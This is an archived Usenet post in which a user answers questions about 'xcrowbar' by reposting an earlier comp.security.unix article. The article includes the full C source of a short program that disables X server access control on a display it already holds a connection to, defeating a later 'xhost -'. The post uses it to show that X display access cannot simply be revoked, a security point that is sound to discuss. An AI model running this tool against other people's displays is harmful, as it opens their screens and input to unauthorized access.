der Mouse wrote: >What's xcrowbar, and how does it "turn[] off the authority mechanisms >altogether"? In my experience, only clients running on the local host, >or the xdm host if the server was started with xdm, can fiddle with the >access control mechanisms. Since several people have asked me about xcrowbar in private mail. I'm just going to reply to the group. xcrowbar was posted to comp.security.unix a few months back. Since the source code is so short and the problem (people give access to their displays to un trustworthy people) has a known solution (only give trustworthy people access to your display), I'm reposting the article here. I've attached the original article (minus a few headers) to the bottom of this mail. It should be obvious what it does. As for only the local host or xdm host being able to "fiddle with the access control mechanism", I highly doubt that the statement is true. X servers (well, at least the distributed ones) don't pay any special attention to whether a client is local or remote. >In any case, yes, it's true that "xhost -" doesn't magically mean >you're safe again. What I do, to get the convenience of "xhost -" >without giving up quite as much security, is I run a front-end program >that accepts connections, ... <snip> I don't suppose the program you run is freely available someplace? -- William ---- Begin article about xcrowbar ---- Article: 8570 of comp.security.unix From: matt@cs.su.oz.au (Robert Matthew Barrie) Newsgroups: comp.security.unix Subject: xcrowbar.c Date: 1 Oct 1994 05:32:44 GMT Organization: Basser Department of Computer Science, University of Sydney Distribution: world Message-ID: <36is9s$qrb@staff.cs.su.oz.au> Like I said, a simple program that lets you do a XDisableAccessControl() on a display if someone decides to "xhost -" you after you have a pointer to their display. matt --- cut here #include <stdio.h> #include <X11/Xlib.h> #include <ctype.h> main (int argc, char *argv[]) { Display *dpy; char *dis = NULL; int c; dis= argv[1]; if ((dpy = XOpenDisplay(dis))==NULL){ perror("could not open window"); exit(0); } while ((c=getchar())!='q') XDisableAccessControl(dpy); XCloseDisplay(dpy); } ---- End article about xcrowbar ----